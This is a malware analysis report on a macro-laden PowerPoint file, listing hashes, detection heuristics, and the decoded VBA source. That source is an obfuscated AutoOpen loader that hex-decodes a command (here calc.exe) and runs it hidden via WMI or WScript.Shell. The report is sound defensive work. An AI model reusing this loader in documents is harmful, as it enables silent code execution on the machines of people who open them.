Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 69fa5fd009dade24…

MALICIOUS

Office (OOXML)

36.5 KB Created: 2021-10-26 14:18:44 UTC Authoring application: Microsoft Office PowerPoint 16.0000 First seen: 2021-10-31
MD5: 3b96319ad80e862e152799496e3bbe51 SHA-1: afd02f98c3bfde58be06afa5c1e11e58925cb1f7 SHA-256: 69fa5fd009dade249ddc6e2f2573b49e5fd1ad22d8914c5027209bf4a3bf9430
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains obfuscated VBA macros, including an AutoOpen function, designed to execute arbitrary commands. Specifically, it uses CreateObject to instantiate 'wscript.shell' and then calls its 'Run' method with a command constructed from hex-encoded strings. The script also attempts to use WMI to create and start a process. This indicates a macro-based downloader or dropper.

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2300 bytes
SHA-256: 982b32f374b8578c9f4b7bf7864d42c650ec2733f3a39340d168d9f4004c96b1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ayngimfsf"
Sub zrnetgsqdtgxkyhvk(pxdgngjg As String)
CreateObject(qlnvgqwsvqjy("57536372") & qlnvgqwsvqjy("6970742e5368656c6c")).Run pxdgngjg, 0
End Sub
Private Function qlnvgqwsvqjy(ByVal shsyrvghdbyt As String) As String
Dim hrtemdoylprt As Long
For hrtemdoylprt = 1 To Len(shsyrvghdbyt) Step 2
qlnvgqwsvqjy = qlnvgqwsvqjy & Chr$(Val("&H" & Mid$(shsyrvghdbyt, hrtemdoylprt, 2)))
Next hrtemdoylprt
End Function


Attribute VB_Name = "izdramsse"
Function glltnsrdzvehqvwv(cmdLine As String) As Integer
Dim laiayviu As Object
Dim wqyxozfonoekxx As Object
Set pgnpnrauteskp = GetObject(dmxzubrftcdr("77696e6d676d74733a5c5c2e5c726f6f745c63696d") & dmxzubrftcdr("7632"))
Set zxhwdbdwcjhgnvr = pgnpnrauteskp.Get(dmxzubrftcdr("57696e33325f50726f63657373537461727475") & dmxzubrftcdr("70"))
Set laiayviu = zxhwdbdwcjhgnvr.SpawnInstance_
laiayviu.ShowWindow = 0
Set wqyxozfonoekxx = GetObject(dmxzubrftcdr("77696e6d676d74733a5c5c2e") & dmxzubrftcdr("5c726f6f745c63696d76323a57696e33325f50726f63657373"))
glltnsrdzvehqvwv = dlolwiqlowtrmf(wqyxozfonoekxx, laiayviu, cmdLine)
End Function
Private Function dlolwiqlowtrmf(opyxekctd As Object, eytkcxni As Object, pqznohjbqzzn As String) As Integer
Dim kgsaoejvooifzhbromjk As Long
dlolwiqlowtrmf = opyxekctd.Create(pqznohjbqzzn, Null, eytkcxni, kgsaoejvooifzhbromjk)
End Function
Private Function dmxzubrftcdr(ByVal fnoqvjszhdih As String) As String
Dim ffosnszynwfg As Long
For ffosnszynwfg = 1 To Len(fnoqvjszhdih) Step 2
dmxzubrftcdr = dmxzubrftcdr & Chr$(Val("&H" & Mid$(fnoqvjszhdih, ffosnszynwfg, 2)))
Next ffosnszynwfg
End Function


Attribute VB_Name = "jibfluanp"
Sub agkqtxodtvzcbmtepo(qcftxijl As String)
On Error Resume Next
Err.Clear
wimResult = glltnsrdzvehqvwv(qcftxijl)
If Err.Number <> 0 Or wimResult <> 0 Then
Err.Clear
zrnetgsqdtgxkyhvk qcftxijl
End If
On Error GoTo 0
End Sub


Attribute VB_Name = "szzjkrodn"
Sub AutoOpen()
agkqtxodtvzcbmtepo xqqirrpeizfb("63616c632e65") & xqqirrpeizfb("7865")
End Sub
Private Function xqqirrpeizfb(ByVal inzklqmbuubx As String) As String
Dim mdhommsbdoho As Long
For mdhommsbdoho = 1 To Len(inzklqmbuubx) Step 2
xqqirrpeizfb = xqqirrpeizfb & Chr$(Val("&H" & Mid$(inzklqmbuubx, mdhommsbdoho, 2)))
Next mdhommsbdoho
End Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/vbaProject.bin 15360 bytes
SHA-256: 399a51fd7316eef61e42380b50e8adb4748cbb9b3eb7ae772e197de0e715db98

Open this report in the interactive analyzer, or submit your own file for analysis.